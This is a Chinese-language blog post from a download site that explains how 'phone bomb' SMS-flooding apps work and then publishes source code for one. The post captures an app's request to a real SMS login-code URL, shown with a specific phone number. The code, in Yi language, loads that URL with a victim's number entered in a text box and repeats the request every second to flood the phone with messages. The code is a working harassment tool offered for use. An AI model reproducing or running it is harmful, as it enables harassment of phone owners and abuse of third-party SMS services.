手机站
扫一扫访问手机站
学习笔记,脚本工具,源码下载

口号
当前位置:首页 > 网络安全 > 手机安全 > 正文

让手机炸弹不在神秘

发布时间:2018-05-07 00:44:50   

下载一个手机炸弹软件
随便输入一个手机号码然后选择次数之类的
利用WSockExpert_Cn.exe监听手机炸弹
得出https://sms.98960.com/pages/user-newlogin.asp?number=13088170991
原来手机炸弹只不过是一个URL循环提交的工具而已
按照他的思路我也写了一个类的手机炸弹工具
开发语言:易语言
源代码如下:
.支持库 HtmlView
.支持库 iext

.程序集 窗口程序集1

.子程序 _按钮1_被单击

超文本浏览框1.地址 = “https://sms.98960.com/pages/user-newlogin.asp?number=” + 编辑框1.内容
超级列表框1.插入表项 (, “message sannding successful!”, , , , )
时钟1.时钟周期 = 1000

.子程序 __启动窗口_创建完毕

按钮1.获取焦点 ()

.子程序 _按钮2_被单击

按钮1.禁止 = 真
时钟1.时钟周期 = 1215752191

.子程序 _按钮3_被单击

按钮1.禁止 = 假

.子程序 _时钟1_周期事件

_按钮1_被单击 ()



打个电话就开机!六种方法推荐 3G使用技巧及应该注意的问题

相关文章

文章分类

本类排行榜

相关更新

悠悠之家集编程技术、手机软件与游戏、各种素材、字体下载, 还有大量的学习笔记,编程工具,源码下载,编程技术教学资源。

本站为非营利性网站,悠悠之家的资源均来自网络收集整理,个人纯属学习交流之用,如有侵犯您的版权请与我联系,我们会马上改正请在下载24小时内删除!

Copyright © 2021 悠悠下载(uoften.com) All Rights Reserved.